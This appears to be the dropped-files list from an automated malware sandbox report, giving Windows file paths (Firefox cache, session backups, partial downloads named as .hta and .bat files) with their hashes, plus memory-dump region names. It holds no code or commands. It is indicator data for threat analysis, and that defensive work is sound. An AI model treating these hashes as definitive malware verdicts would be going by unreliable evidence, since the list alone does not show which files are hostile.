SHA512 0f508b3db6d793b46676c1997027551832c296e1d1a815a45a5c9008ae7c4a925b92a5a6eba24b41b935ce104804a8217602c21165fc088be774b92e4bf4a6c2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\1686

MD5 da38b76627e1046a91402a9c642de999
SHA1 1c8f10f85d640026f20f8364b0a220c62f914039
SHA256 7b50949d3ae182c10089e30a7d2f380ce0ee553f31acb9f30ecb8a1ced20bb14
SHA512 7b28bd407a85c4672c0f457c016960ebed13d3e0bb48d978b60f80ca0914f8db683cfdfe35d0a814a2eaea27aaa432893cdca4424cf749fdeca6280c01540c49

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\16504

MD5 5eee27270bdf5fbd329680773c23a286
SHA1 4d9f47646a686fbf9cedbd677d14444e4c46a83f
SHA256 6f1b09ef02bb1c0fb3f81dddb09edac7635a372c9b7198de68b967b6411fdb44
SHA512 20c76518645da2eace82723d0c0024cce3584f14d4f3c128b02cfbe6d40909672cf073aaac3ebcab7896b0f3a164074042a2b59f579eb5310e1e5520c8827ea7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\138\{e8cf76c9-df00-4f16-b07d-c36de2661c8a}.final

MD5 61458212bf04ff538a05939e4336f7eb
SHA1 e6568de7b1242db3fa723208ea0cba0d5eec0630
SHA256 ec21ed938b96957814df264016c6736204b7972bde1cb0000ba7b54ac4051ef0
SHA512 e16508a34e7a4987268de0a9d3c93a9c1cfde481db27250c20124ff7ba02cd9a13f7b8c3ecad322504e880ee4a53034b2a90bdacf5790b00aa561dbdd13b09ad

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\32081

MD5 04c829d9520d56fbb7f4b1c065e17c2b
SHA1 a54c2c354364fc8d04846a94ad07a0d84357fb64
SHA256 7c882bb956bcd3a20d618c8a701767b2e39cd3393f029104dcaa6fd44ed6291f
SHA512 2ad6abf084ec41abaf815d426812cda1b57d1764c14ca4870a298e297d93896caf0487e549c7044e39f0a2682201c93438b3d2de250c0a41c6d51678433758ef

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 28a50d3f545282dabeec13cdc08944bd
SHA1 b6b77152026d4375ce3a4586c0b2a06c20c8f1ac
SHA256 6681700b93231e4ed47a070b35811cdffca7460c878bebef8eb73a1726eae333
SHA512 e94001f94a91d2ba75ff75b218d738631fe1e9c0841646a9d6cd2c4b3bb8e14e094d3d509365b0da311fbd8aea7c04ff02657407c82464ef47e1798c1eaba888

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 6be25f375720f23b64282112101ab42a
SHA1 4e24effead66fdeb599618e04c417eda2790eb36
SHA256 cbcb3df641e71f8e67010c5257721905eefbff44c383c62df74cfae0288e24f6
SHA512 390af8a43a0c0797da6b965a15754a4611cf142eaccca92da6088678a6fdab29ae685d9a2d2d971253c42adf5d9d6920a422253c0bf937aaf9d00bc1cf65a245

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 c1c361b9e5c1b336b7eda876579f7595
SHA1 3bbb43e4433e82009003c6e21b1396ea0df8d179
SHA256 76863fefd9f82bba6335845297e98c765e45ff333bb15ec4b6dea8ebb1300a8a
SHA512 8b625447ca37cd8037d1372917fa3e7fdb771dc6d0bdd6c019f7e69294fa65b4c60a5e864c14799f9c29a258ade98fdc5793476e77c3e352daabfd5a351b6226

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\jumpListCache\8scUkgTJ77iYHxZ7zE4eXg==.ico

MD5 a3c1306e53848dce3a3c2fec6e1cdff2
SHA1 87f8463535c624202f9b6efe26e993b0b1f3157c
SHA256 d2d32f8573ccc7ad555d258c8362cfb0b699eb4b004f93dbeb171f3510df055f
SHA512 871e877c73990e372a7a41d9851e9dcf301efdc543696aa4dbc35b8a121e24b7fcdf76d426b5f90fa3a14253440697de01ffa0d82d417e5490560ce7d9740aa1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\32\{be847667-ca5a-4679-b616-67e4d728cc20}.final

MD5 a316a915798ea49e5c98cd33a94e91fd
SHA1 98834276749fc0fb8d7e8574e009d7c4a43a3087
SHA256 41e6c1ad3feeb23ba89322eafadc8ef00b251ea12201084f42e4287b5e49fd5b
SHA512 386e25c6ace4944a8c169e1e4ef96d047a5ce24a7455fc4c780fedb6e2673e9542202760824bd99cc69a90d18b095bac28fda7a1efd1c6683820231ef5912172

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\10629

MD5 c93aa72c573458c7a0e63d80b52bc5ca
SHA1 a4832cee143ecb9c96e3880c46f7560617c1399f
SHA256 2e01a1d010fc2ab5cade6a81c0fdd2e5956e663a314dbfabcee87a099293196a
SHA512 8fee5a4140f2ccfe15b50de550a5d9e0c0bd94206fe303402a636e2160d6ae0046e77877b46383ca8a554ef8f02244b2539174bf9bf657176d7bd6b7c8f4f540

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\126\{da2ed82e-ef2f-46ce-82ab-d8f47bcdfd7e}.final

MD5 78e73a8b3de45edc08c08c00a6473e7d
SHA1 a111e068c32a10cd921f382a6a58f853d663effa
SHA256 b3a33431e23df376be0ac18f54dce354747bf8b31daf7376828ffb2ccd10ac6b
SHA512 fa8f278af8018ca8a6b19a75c445dc0a68ddc26c200274351c2844266f232d6f90fe234339263866e373b407229bcb585c62f34125f195221ad05a84d34971ba

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\29348

MD5 e822089dc52c73747400e715d319f8df
SHA1 9c6b19a638b655d65acc223b6fc3fd6d008afd51
SHA256 58bb5b739990ae5f1365bdc60ec25eb1f5edc767a6e3747886de6c0c5c3a407c
SHA512 09a5487be4f6d10a97d0769c3c5acc143d9f06ab110511cf9c5b4fcede3b1a3994bf10fd9e4a86cce16caeb399c65b59b1a659ba628c6d9e7b03b27b30737852

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\1927

MD5 b4e0470b2e64e60f370de6765695bb18
SHA1 92b943e82ab47b99ffd2921458f884a67af9809a
SHA256 0e9fcd4671396be4cbe2899e5162b6e7cf992a92786112d9b9b7937da57fd1d7
SHA512 675839d66da5d26fe93b33a517a963c05d44f09d28ffdcc8a4310826cd47b57c9ff8fe3b2f7468ab48969c6cf88f721ad2f99186cdb19361cd23e1a7d623ed45

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\10176

MD5 7a60d8b0e3759fbc6ec306b3c8d04c78
SHA1 36865967b750c54914098e80f242b39978531a97
SHA256 c8c62348b813616bb1bfc39ee5620e62f89d8d24762987ad340b27322e8fbc32
SHA512 c8b29322af0256dc5912103d428b36a2bcbbcfd561360e1cd4b7f320e69f9f0fbaa26c7d9a00b7970cb2d51338b866a6610c07f0bb3fc08b11926f49a5e6901a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\11583

MD5 98615b4967d62c26cc772ba98b50db2f
SHA1 83b42bdd47f581b737f979aa3f92ad43cf5a6fad
SHA256 7476f23807696d1f78796fa3eb59daf5ffc83fbbda577a62bc903c21494d3af9
SHA512 103a1979b16bb3266156cbd27922eb923825e344e5cc25528bc12919df9a3bd4d07ef2308c347d3429f98a3617e754e464566870cb8920d8d7b02ac0856e5b32

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\28956

MD5 ad856332d608fb825c78737bd6201d4a
SHA1 9c36506de2f5a11b07b4ddc86ded7351e76766a1
SHA256 d0d20f9c883d9290916373d336b899d467200c32b882bf9ce86c1cb543bb2c75
SHA512 2af4ea021a2e700cd2a03eb2432907cf0c06ca95813c18eb9dc43dd2db3da7fd368aec2d718a79fe5a8f31f871a4d509238a919fe5245e62c68bb1687da0d52c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 4f7228d279b4e1ce618a25656f1c828d
SHA1 f6512df640896f416c9b75f3ad0209f8598eb45e
SHA256 5519bd54ed28894a7c57418737aa80e87286bb1bb0cd3ef7df9bdd155bfe1482
SHA512 99c1feb821e1b7929c67caf1092fc0cb7d8582315f4ab1566ded05f2dcb17e8ca8b381a0e70e7e4bf31341c8967b609d1cbb12621019489d7779352145d6c5a6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27659

MD5 8bb9dac2f7f102b29d3745803998ccd5
SHA1 63977919d88e0e97fb0ef6fda49f18fae1a57d48
SHA256 2a9e36b4facb53a284050875abcdcd7c2faed090ff99520e95a5a4354bb6331e
SHA512 1b3ccdabc0fd58acad886d75bb60ec133989f2e1dce146bf7d48fb60a1fc03ea3adbf951192bb8ab7a841f2878eae946132ce03ae3e19331ee8d57fe1baf7b20

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15192

MD5 f8d695413f1fe9641797e0f7ec545bc3
SHA1 e72c5f9fdb067895853aedc1a65c383e859bb87e
SHA256 083688293eebd40747eb25aaa83cf579990f2f9278334ebc6b15275400e53f36
SHA512 a3770551407b43b42f3d056681b4baa723ef685beecc8164673e798e368f642dfa6e2d48b237f1a8c3d3df18612aea66e592bb1d6ef1c54cabbc6b3c5310e81f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\19529

MD5 e6c957d66ac579ed3e8e4c8cf8cbbec5
SHA1 7006663631dd46f07bad2421ab80bdfff199e8c9
SHA256 aade998132f294e2f51f2cf1a8700f431beef00125bfc8e78642b998830891d8
SHA512 cf4cdd45a8d1b4c0b6b37800d8c77b8031da4492c9ea947c1577336e421d9e6fa822f3dd0a1542d1715245c4435920d5933dd7221e06d66af23eef76e76bfda6

C:\Users\Admin\Downloads\index(1).rYpCE9o6.hta.part

MD5 dbc5a204c56d2c6c974bb9ce287978d4
SHA1 dca280ec6fcc06611132200b78bf9e7bd66504ef
SHA256 d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
SHA512 6d169c338630b22fac4d68a35c03e48c990c467423829077c0689acfc12e462d1f9736c0b14146a85ade55c8ee775d06b6c4903b44287421a98b04a2bbdf60ea

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\141\{2a0fe0e9-013f-4c38-9950-f9777ce03d8d}.final

MD5 94f20609ac3b2eb44fbca281b03859e1
SHA1 fe1b485cd29efbf3c7ba4237129c9894598faaa4
SHA256 fcac86fc4783b4d62730ce65a45e1fd6a1c0cd08ff8b8ddeb332e45ec9efda84
SHA512 8e6d3709ef08638488e652256c9eeee1b852e4a1190e2515d3b8c7cbb0916b4b050322de9226b49a039bfd265551448319d3601885c5186e043c56d142d358df

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4919

MD5 d453fdaef2a2f5f89922ec8ae4af114f
SHA1 eca42de2966627f60526aba4061b4b0c81c105d6
SHA256 0a4515709df398c54db30f08908bd63b03c6d1492426032722b5915a432d8f28
SHA512 e93be16d17adc00c714a80f70c0339550979fe7b7696a97b48c396b37c23bd7703d1f30dab7a3aa7f3408f11e32be7539b4fe0cdd04b6694a22aef3b8c7b838b

C:\Users\Admin\Downloads\GoGi.NLu_0hEx.bat.part

MD5 dec0c1137005d80ff2dcc74c11639821
SHA1 60ea4490fdb0250d0f3a7c02a3a5e348a109d5f9
SHA256 06275239e40d00a87e3e16f811fc37f300184177b3f27828ad71bf6c866a71f5
SHA512 b068e2050e2bf4a20d2422cf24e10bf69798d020fca0b5c0139fe6756e92a92df6f89f33f74e69cf14d1d7f3e41aba7de90e9101d29e8786bf7093d7a2592660

C:\Users\Admin\Downloads\GoGi.NLu_0hEx.bat.part

MD5 cab2108a81d68104dd9b15efcedf8351
SHA1 03852c18f75cad87f71693fb1973d9a04e8910ed
SHA256 a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa
SHA512 e474ce03766f8e21fdb14e072144e8e1c5fa1f30e66ea4f7a05fade86bd783fb4dec65d23ab01861524959a0a029cb2112074116fdbd72d02ab4794216ed95f5

C:\Users\Admin\Downloads\DzGtgj0u.xlsx.part

MD5 dfa28ceef932c1605d40981a5023dab0
SHA1 a6e8c5cdd144cb27685198fecad8f9def48dfbe8
SHA256 9e0bac9938b4059f69ed52af74337c38c242213ecd432746a483d44e1e74dff6
SHA512 28bc8a4c30e566a60280b194f5442c160f0b9c8b3dd10fa8d321035e7a3b76271373274b0d25bb8f04ac213f4293f3bde7ee8c6ff7d77caa2a4ba5276e0ccc80

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\30543

MD5 91c13f8aa0911dd87b69387eeced956d
SHA1 cd1741494b886ff634d48f9b509745471867750a
SHA256 b432eeabdeab4f253301b20c30efd7cdb53a21f6483fc7dbf6aab1260b6a0686
SHA512 65a1da79752cc729c3b7451fa7d8bc969f602010f3f3dbefb018b3b8fc53282a421ddd0461f49002b60a2bc2298cba8c2bf3267c2d0ac37846de87b0baca27ef

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\17055

MD5 5343408069f021cfd16a163c09828c2e
SHA1 20ed964f8825ec5bb2fbc132b68ca12c636c19cd
SHA256 3b3c69b9e6c2cba226c8ecfc6819c7a3b3707193230909e30aebd6ad8abb4063
SHA512 c0071cbea8fda8dc87d08061858b148a05f26b7b33982005bf2f8c39e8c10078cdb84f9ce903528f9ec8094188f78f844b45e86db3fc47fc24941f9bc41de907

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 ef680d343ff5252988f773266a176f67
SHA1 fd3d7a60d06a31dd5f536624a9427abac1f2deb4
SHA256 3a1535a9ecf04959af1a05ce8797628f879be947564ff9738bed1e2bd518d5e6
SHA512 0f23b958f473ca1044dd4110d5e0318337fa6b99ad62b0488cb08d9a44d52ae5e3dbebb43a5978002e44d750ca6e3c407fee16a99f9714205899d30830c7e126

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\20506

MD5 89be9219021a8e65d7f202eece918dcb
SHA1 9babd7976d20b4f38369fde1adf667fe4004df00
SHA256 0974174b8f072c2c405d0103fd9deb91f4fc63e70be2e121a02624bb2f3d58c1
SHA512 b5894ffde293c21c3a3c93db22fbce1dd361ca68c0ed25418afe03b92c12d70dff78f251107a4dd90d40d8a0db6f704b8fac728ebbedcdc33ccf402812f3753a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4026

MD5 67a520eedaab2d42dcf01c75827f408e
SHA1 c1328efe062bf82a2b040628eb1e95fa168d53ef
SHA256 10a50d592b405abc661e3fd684211f9aeb54ff2d505f1e5e41091845633c91b4
SHA512 43d6289f02cf3308a901ed4a2037e87552633745e532c27aaebb86a72a2693b75c6881592d2e92385edf70cee14247e21589614c5ff663bffefca639257015be

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27156

MD5 50ee6c8d2530692949e48d9155de6577
SHA1 4d07486c346242ee9af1e3fa8a7eb8be75f1684c
SHA256 4d29d9b0270b85bddb772bd110b840f7ae5e3b981f8fd84babf4d6a7538ac1c1
SHA512 992656f601c31c399a2921c1bde4e222a6d04014ba9b36724a8d80b3bc233045fb1ff2c2692b1702bd982fe61d8e23c555c25af8698780b8f52e1fc59f31d19a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\9\{b4909cd2-7ec4-4b3a-a4ad-7b154a85a209}.final

MD5 292a587101f8f12d5a31a4afdd1ace9c
SHA1 f8a7d0b03416f43a1ace59b1dc77b4acc7123389
SHA256 8a02dcfad0519edb3da976edbd23a4fd2fd49ab87321011651287e35b6036563
SHA512 6ae668092d673ae90a03fac533cc92c0fd7c0b54f6aee267f2ae99842e554e2660b10599d30bfc5cbaf6902873f5a23e6dddc393d81b5a2ddd0b514371b93e9f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\2876

MD5 e652f940d0aa29aeb1e3f005c219caa5
SHA1 ff0d2916279d5110aedd983263971397e6eacb59
SHA256 efda3db576be1a63155cbf87d6ece6b1923a53ae1c2b9f677d4658d2bf4ab463
SHA512 f2a7ebed61e3a699dc04c0d775a01170f6c8606b1b9ff016e5d2b4c0a7a8c378c6e8854ec7f5f838ace62feee7997af48c6ed455b6940d9449c8afc00337d01d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a441ad907a3fe989221c43a7519a9039
SHA1 f42ddcc55a59019bab05abda27880274b9bb3fb5
SHA256 5644b7d2f9dbc6c25be2ed4b290ff44f9e22ca98dbc6a7b785fe31b0bcb03140
SHA512 ff2bb74778d1dc85459e3df83d81e5f1f22aa2533b45dfd366ddb3c99cb388937e1043264e4712a94bf9eeeaa4a728b37a826e79da74b7f8a7eb3ddce3d4fa48

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\6516

MD5 4d713ce24637240ab400445043f13fbd
SHA1 ce6ef653f268e34091e4f6bc51413779cfa4ef17
SHA256 078d5819c5497e7948c4c8b41acfb6568d9a8c252234443697ed61c603468751
SHA512 045b11b586d463782454417e0edebef87c32acb697effef20c9447241846c14ebc5872008b3f690efb6b1a65e6fefe5507110fa4572a27985e85d650671640b0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\EDF4BF647A47A8CCC2D2ABF030AF096FE5297F89

MD5 2454c6d66dd804c49fb36ca40051f6c3
SHA1 3a263bd9cbd17e8ff03fa27ca566e20f39ca3d90
SHA256 55a755a7b0d98856af8ef24e09d069dbbbd166f8049dde00d1780c410baffe3c
SHA512 207f613e894db86dbf56c853f58baa0ce0212faff8055b296cc8d8d281ec619273767503a1e082923e5e7b024b5c78bb35b87c436f67217c5a8869a69e6eb94a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\152\{e1232316-9b19-4f92-8f72-958817e81898}.final

MD5 1e312b0c2cc8e578d800e240c808594d
SHA1 d5cfaab1e3286e4465d5276292c8fdaf851bfa76
SHA256 e94dab06d9360836eb77c6f15bc9233c38ac505feeb6de2054c983e52fc292a1
SHA512 a38ca2c4211179431eabb9ac5fe5f00191901e1a7bc905b46203276cce5149be727b4cb7799169fcfd024b45821f2e77168239fad2f3a2fc2573241aaed388e8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\23988

MD5 32c5f85ce9bcb440b54010fe59f892b4
SHA1 b088969f4b8ad94056d3852968c5c18afb5739c3
SHA256 e7f004dbd137da5d6a7f3831da66d699a5b35cf861d68028626392a0f5a6c40f
SHA512 2378860239434ee2b0d5f892c0fc4d2cbb1119d4ef7e20533513ee0b58cac0981440d1b5fd992892fcf88bae21e841144adfd927e89b146c3e130c7535fd8fa9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\14160

MD5 6d6cf93a9fe5c69307078053c4dad92f
SHA1 35091a8566d9dcdfcab6ee39f8f19abc4df91209
SHA256 163bdb7fc5e7b78ccb3a09fdd55396772d7f0a42eda9fc22c606c282d5b8847f
SHA512 5096ad7641e71278a3daa284c040f66051139db91c9d4d435d249f72437ccf2d11e8315260c67c603e22a54ecc33c82619c11fe2e3cc3b5a193adfb3675915dc

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15552

MD5 a54ffa0833b9cb58a00039b8ea1d5b22
SHA1 55618017622b1f740870eaecb7b51993e6ec5df3
SHA256 deee7c5e0c00b21f84ab0dc0733904c5b76da343248b255d14b0e85640b69337
SHA512 7322cd9ff59fc977dbbbc6b7c22506dae81ae2c532b5d6d0bb5dc0ca6a5989187bca285c671af257278278759b23250ad88d476e4493dde73dddcbb4a5773e74

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 f01839c17bd852e051fd1db81669e299
SHA1 569aac369b43fb28f5aa756a67358bd91470bcbc
SHA256 99f146da5ee11cb5c83ba6ad7bb561c31c506668f1503ffc834151bb556d800f
SHA512 e35e6353f54902c5b1ac4d6547c552256faff753aabe8c0142177287b94571476b0358a59d1b7ded87c995300c6ec949068c3c5e4629b8c1f57af00455072ba9

memory/3864-1985-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp

memory/3864-1987-0x00007FFC91070000-0x00007FFC91265000-memory.dmp

memory/3864-1989-0x00007FFC91070000-0x00007FFC91265000-memory.dmp

memory/3864-1988-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp

memory/3864-1991-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp

memory/3864-1993-0x00007FFC91070000-0x00007FFC91265000-memory.dmp